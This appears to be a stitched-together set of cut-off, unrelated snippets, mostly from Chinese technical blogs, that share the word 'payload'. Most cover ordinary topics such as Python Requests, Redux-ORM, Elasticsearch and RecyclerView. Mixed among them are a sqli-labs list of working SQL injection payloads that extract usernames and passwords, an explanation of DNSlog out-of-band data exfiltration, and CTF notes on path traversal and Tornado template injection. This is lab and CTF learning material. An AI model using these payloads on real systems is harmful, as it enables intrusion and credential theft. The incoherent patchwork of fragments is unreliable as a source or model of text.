payload

目录 Requests模块说明 Requests模块安装 Requests模块简单入门 Requests示例 参考文档 1、Requests模块说明 Requests 是使用 Apache2 Licensed 许可证的 HTTP 库。用 Python 编写，真正的为人类着想。 Python 标准库中的 urllib2 模块提供了你所需要的大多数 HTTP 功能，但是它的 API 太渣了。它是为另一个时代、另一个互联网所创建的。它需要巨量的工作，甚至包括各种方法覆盖，来完成最简单的任务。 在Python的世界里，事情不应该这么麻烦。 Requests 使用的是 urllib3，因此继承了它的所有特性。Requests 支持 HTTP 连接保持和连接池，支持使用 cookie 保持会话，支持文件上传，支持自动确定响应内容的编码，支持国际化的 URL 和 POST 数据自动编码。现代、国际化、人性化。 （以上转自Requests官方文档） 2、Requests模块安装 点此下载 然后执行安装 $ python setup.py install 个人推荐使用pip安装 pip install requests 也可以使用easy_install安装 easy_install requests 尝试在IDE中import requests，如果没有报错，那么安装成功。 3

0X00：前言 sqli-libs是一个学习SQL注入的开源平台，共有75中不同类型的注入。源码可到github上搜索sqli-libs找到 0X01：Page-1基础挑战 0X02：每一关的payloads LV1: id=1' id=1' order by 3-- id=-1' union select 1,2,3-- 注：-1 id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()-- //列名 id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'-- //表users中的列名 id=-1' union select 1,username,password from users where id=1-- LV2: id=1' 上一题是 near '1' limit 0,1' at line 1 第二题是数字型注入，没有单引号，payload与1相同 LV3： id=1' id=1') or 1=1-- id=1') order by 3-- id=-1')

Redux-ORM Redux-ORM 库提供了一个非常有用的抽象层，用于管理 Redux store 中存储的范式化数据。它允许你声明 Model 类并且定义他们之间的关系。然后它可以为你的数据类型生成新“表”，充当用于查找数据的特殊选择器工具，并且对数据执行不可变更新。 有几种方法可以用 Redux-ORM 执行数据更新。首选，Redux-ORM 文档建议在每个 Model 子类上定义 reducer 函数，然后将自动生成的组合 reducer 函数放到 store 中： // models.js import { Model, many, Schema } from 'redux-orm' export class Post extends Model { static get fields() { return { // 定义一个多边关系 - 一个 Post 可以有多个 Comments， // 字段名是 “comments” comments: many('Comment') } } static reducer(state, action, Post) { switch (action.type) { case 'CREATE_POST': { // 排队创建一个 Post 实例 Post.create(action.payload) break } case 'ADD

目录 Elastic Search Docker中安装ElasticSearch Elastic Search API得使用 创建Index: 修改Index Mapping: 修改Index Settings: 创建Index模板: 单条件查询: [query->term] 多条件查询: [query->bool->must->term] 对查询结果进行折叠去重一个字段: [collapse] 对查询结果进行折叠去重两个字段: [collapse->inner_hits->collapse] 对查询结果进行聚合实现Group BY: [aggerations] 对查询结果进行聚合最大值/最小值: [aggs->min/max] 对查询结果进行聚合时，需要使用其他数据: [aggs->top_hits] 在查询Payload中写逻辑运算: [script] 在更新Payload中写逻辑运算: [script] 依据查询条件进行更新 依据查询条件进行删除 简单得分页查询：[from size] 复杂得分页查询：[scroll] 多条插入数据：[_bulk] 重新索引：[reindex] 查看所有index：[_cat/indices/] 设置Cluster：[_cluster] 删除所有生成的Scroll 已知文档Id情况下存在更新，不存在插入数据[update] 提高 ES效率

Pipelines - .NET中的新IO API指引（一） Pipelines - .NET中的新IO API指引（二） 关于 System.IO.Pipelines 的一篇说明 System.IO.Pipelines: .NET高性能IO System.IO.Pipelines 是对IO的统一抽象，文件、com口、网络等等，重点在于让调用者注意力集中在读、写缓冲区上，典型的就是 IDuplexPipe中的Input Output。 可以理解为将IO类抽象为读、写两个缓冲区。 目前官方实现还处于preview状态，作者使用Socket和NetworkStream 实现了一个 Pipelines.Sockets.Unofficial 作者在前两篇中提到使用System.IO.Pipelines 改造StackExchange.Redis,在本篇中作者采用了改造现有的SimplSockets库来说明System.IO.Pipelines的使用。 文章中的代码 （ SimplPipelines， KestrelServer ） ## SimplSockets说明 + 可以单纯的发送（Send），也可以完成请求/响应处理（SendRecieve） + 同步Api + 提供简单的帧协议封装消息数据 + 使用byte[] + 服务端可以向所有客户端广播消息 + 有心跳检测等等

测试一些网站的时候，一些注入都是无回显的，我们可以写脚本来进行盲注，但有些网站会ban掉我们的ip，这样我们可以通过设置ip代理池解决， 但是盲注往往效率很低，所以产生了DNSlog注入。具体原理如下。 首先需要有一个可以配置的域名，比如：ceye.io，然后通过代理商设置域名 ceye.io 的 nameserver 为自己的服务器 A，然后再服务器 A 上配置好 DNS Server，这样以来所有 ceye.io 及其子域名的查询都会到 服务器 A 上，这时就能够实时地监控域名查询请求了，图示如下。 DNS在解析的时候会留下日志，咱们这个就是读取多级域名的解析日志，来获取信息 简单来说就是把信息放在高级域名中，传递到自己这，然后读取日志，获取信息。 这样说原理很抽象，下面通过实际例子看下。 http://ceye.io 这是一个免费的记录dnslog的平台，我们注册后到控制面板会给你一个二级域名：xxx.ceye.io,当我们把注入信息放到三级域名那里，后台的日志会记录下来 0x01SQL盲注 就以sql盲注为例。深入理解下DNSlog注入过程： 通过DNSlog盲注需要用的load_file()函数，所以一般得是root权限。show variables like '%secure%';查看load_file()可以读取的磁盘。 1、当secure_file_priv为空

According to RecyclerView documentation about medthod notifyItemChanged(int position, Object payload) Notify any registered observers that the item at position has changed with an optional payload object. I don't understand how to use second paramenter payload in this method. I have searched many document about "payload" but everything was ambiguous. So, If you know about this method, please show me a clear example about it. Thank you very much. Check out this sample code that demonstrates the feature. It's a RecyclerView that calls notifyItemChanged(position, payload) when the item at

The Wikipedia entry on HTTP lists the following HTTP request methods: HEAD: Asks for the response identical to the one that would correspond to a GET request, but without the response body. GET: Requests a representation of the specified resource. POST: Submits data to be processed (e.g., from an HTML form) to the identified resource. The data is included in the body of the request. PUT: Uploads a representation of the specified resource. DELETE: Deletes the specified resource. TRACE: Echoes back the received request, so that a client can see what (if any) changes or additions have been made

1.Requsets模块的安装 进入cmd cd C:\Python27\Scripts pip install requests 2.Requests模块的简单使用 1 #HTTP请求类型 2 #无参数的get类型 3 r = requests.get('http://httpbin.org/get') 4 #有参的get类型 5 payload = {'key1':'vaule1','key2':'value2'} 6 r = requests.get(url,params=payload) 7 #无参的post类型 8 r = requests.post("http://httpbin.org/post") 9 #有参的post类型 10 r = requests.post(url,data=payload) 11 #data不光可以接受字典类型的数据，还可以接受json等格式 12 import json 13 payload = {'a':'杨','b':'hello'} 14 r = requests.post('http://httpbin.org/post', data=json.dumps(payload)) 15 #发送文件的post类型，这个相当于向网站上传一张图片，文档等操作，这时要使用files参数 16 files = {'file': open(

1.WarmUp 思路很清晰，文件包含，漏洞点在代码会二次解码，只需注入一个?就可以使用../../进行路径穿越，然后去包含flag，flag路径在hint.php里面有 2.easy_tornado 题目就给了这些信息，flag路径已知，render应该是跟模板注入相关，hint.txt给的应该是filehash的算法， 看看url，我们可以控制文件名和文件hash 随便传一个不存在的文件名会跳转到error页面，这里直接把error字符串返回了回来，所以尝试一下模板注入，写个9，也返回了，猜测题目应该是我们需要去算出flag文件对应的filehash，但是因为这个密钥是不知道的，所以我们需要去通过模板注入弄出密钥，题目又是tornado，这里常规模板注入的字符比如[],()都被过滤掉了，因此尝试找一些tonado的全局配置来读取看看 所以用handler.settings可以访问到tornado的一些“应用程序设置“，那么web网站中的一些变量信息应该也在其中存储着，所以直接访问就能得到密钥，然后就可以根据这个密钥来构造filehash 得到secret然后md5哈希一下就可以，看文档还是有用的，不会就多看文档多google，当然思路要对，比如这里就猜测secret存储在应用的一些全局配置中。 3.随便注 这里首先提交1，这里回显的1对应的数据，然后提交1'，报错了 再提交1'